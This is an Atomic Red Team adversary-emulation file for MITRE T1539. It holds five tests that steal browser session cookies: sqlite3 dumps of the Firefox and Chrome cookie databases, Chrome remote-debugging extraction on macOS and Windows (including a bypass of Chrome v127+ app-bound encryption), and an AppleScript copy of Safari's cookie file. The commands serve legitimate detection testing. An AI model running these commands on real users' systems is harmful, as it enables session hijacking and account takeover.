Atomic Red Team doc generator
180 lines
9.4 KiB
YAML
180 lines
9.4 KiB
YAML
attack_technique: T1539
|
|
display_name: Steal Web Session Cookie
|
|
atomic_tests:
|
|
- name: Steal Firefox Cookies (Windows)
|
|
auto_generated_guid: 4b437357-f4e9-4c84-9fa6-9bcee6f826aa
|
|
description: |
|
|
This test queries Firefox's cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot's cookie theft function.
|
|
Note: If Firefox is running, the process will be killed to ensure that the DB file isn't locked.
|
|
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
sqlite3_path:
|
|
description: Path to sqlite3
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe
|
|
output_file:
|
|
description: Filepath to output cookies
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\T1539FirefoxCookies.txt
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Sqlite3 must exist at (#{sqlite3_path})
|
|
prereq_command: |
|
|
if (Test-Path "#{sqlite3_path}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
|
|
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force
|
|
executor:
|
|
command: |
|
|
stop-process -name "firefox" -force -erroraction silentlycontinue
|
|
$CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite"
|
|
"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}"
|
|
cleanup_command: |
|
|
remove-item #{output_file} -erroraction silentlycontinue
|
|
name: powershell
|
|
elevation_required: false
|
|
- name: Steal Chrome Cookies (Windows)
|
|
auto_generated_guid: 26a6b840-4943-4965-8df5-ef1f9a282440
|
|
description: |
|
|
This test queries Chrome's SQLite database to steal the encrypted cookie data, designed to function similarly to Zloader/Zbot's cookie theft function.
|
|
Once an adversary obtains the encrypted cookie info, they could go on to decrypt the encrypted value, potentially allowing for session theft.
|
|
Note: If Chrome is running, the process will be killed to ensure that the DB file isn't locked.
|
|
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
cookie_db:
|
|
description: Filepath for Chrome cookies database
|
|
type: string
|
|
default: $env:localappdata\Google\Chrome\User Data\Default\Network\Cookies
|
|
sqlite3_path:
|
|
description: Path to sqlite3
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe
|
|
output_file:
|
|
description: Filepath to output cookies
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\T1539ChromeCookies.txt
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Sqlite3 must exist at (#{sqlite3_path})
|
|
prereq_command: |
|
|
if (Test-Path "#{sqlite3_path}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
|
|
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force
|
|
executor:
|
|
command: |
|
|
stop-process -name "chrome" -force -erroraction silentlycontinue
|
|
"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c #{sqlite3_path} "#{cookie_db}" | out-file -filepath "#{output_file}"
|
|
cleanup_command: |
|
|
remove-item #{output_file}
|
|
name: powershell
|
|
elevation_required: false
|
|
- name: Steal Chrome Cookies via Remote Debugging (Mac)
|
|
auto_generated_guid: e43cfdaf-3fb8-4a45-8de0-7eee8741d072
|
|
description: |-
|
|
The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
|
|
|
|
If successful, this test will output a list of cookies.
|
|
|
|
Note: Chrome processes will be killed during this test.
|
|
|
|
See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
|
|
supported_platforms:
|
|
- macos
|
|
dependency_executor_name: bash
|
|
dependencies:
|
|
- description: 'Install Go'
|
|
prereq_command: |-
|
|
go version
|
|
get_prereq_command: |-
|
|
brew install go
|
|
- description: 'Download and compile WhiteChocolateMacademiaNut'
|
|
prereq_command: |-
|
|
/tmp/WhiteChocolateMacademiaNut/chocolate -h
|
|
get_prereq_command: |-
|
|
git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
|
|
cd /tmp/WhiteChocolateMacademiaNut
|
|
go mod init chocolate
|
|
go mod tidy
|
|
go build
|
|
executor:
|
|
command: |-
|
|
killall 'Google Chrome'
|
|
sleep 1
|
|
open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
|
|
sleep 1
|
|
/tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
|
|
cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
|
|
name: bash
|
|
elevation_required: false
|
|
- name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
|
|
auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
|
|
description: |-
|
|
Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
|
|
Note: Will stop any instances of Chrome already running
|
|
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
$devToolsPort = 9222
|
|
$testUrl = "https://www.google.com"
|
|
stop-process -name "chrome" -force -erroraction silentlycontinue
|
|
$chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
|
|
Start-Sleep 10
|
|
$jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
|
|
$devToolsPages = ConvertFrom-Json $jsonResponse.Content
|
|
$ws_url = $devToolsPages[0].webSocketDebuggerUrl
|
|
$ws = New-Object System.Net.WebSockets.ClientWebSocket
|
|
$uri = New-Object System.Uri($ws_url)
|
|
$ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
|
|
$GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
|
|
$buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
|
|
$segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
|
|
$ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
|
|
$completeMessage = New-Object System.Text.StringBuilder
|
|
do {
|
|
$receivedBuffer = New-Object byte[] 2048
|
|
$receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
|
|
$result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
|
|
$receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
|
|
$completeMessage.Append($receivedString)
|
|
} while (-not $result.EndOfMessage)
|
|
$ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
|
|
try {
|
|
$response = ConvertFrom-Json $completeMessage.ToString()
|
|
$cookies = $response.result.cookies
|
|
} catch {
|
|
Write-Host "Error parsing JSON data."
|
|
}
|
|
Write-Host $cookies
|
|
Stop-Process $chromeProcess -Force
|
|
name: powershell
|
|
elevation_required: false
|
|
|
|
- name: Copy Safari BinaryCookies files using AppleScript
|
|
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
|
|
description: |
|
|
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
|
|
supported_platforms:
|
|
- macos
|
|
input_arguments:
|
|
destination_path:
|
|
description: Specify the path to copy the BinaryCookies file into.
|
|
type: path
|
|
default: /private/tmp
|
|
executor:
|
|
command: |-
|
|
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
|
|
cleanup_command: 'rm "#{destination_path}/Cookies.binarycookies"'
|
|
name: sh
|
|
elevation_required: false
|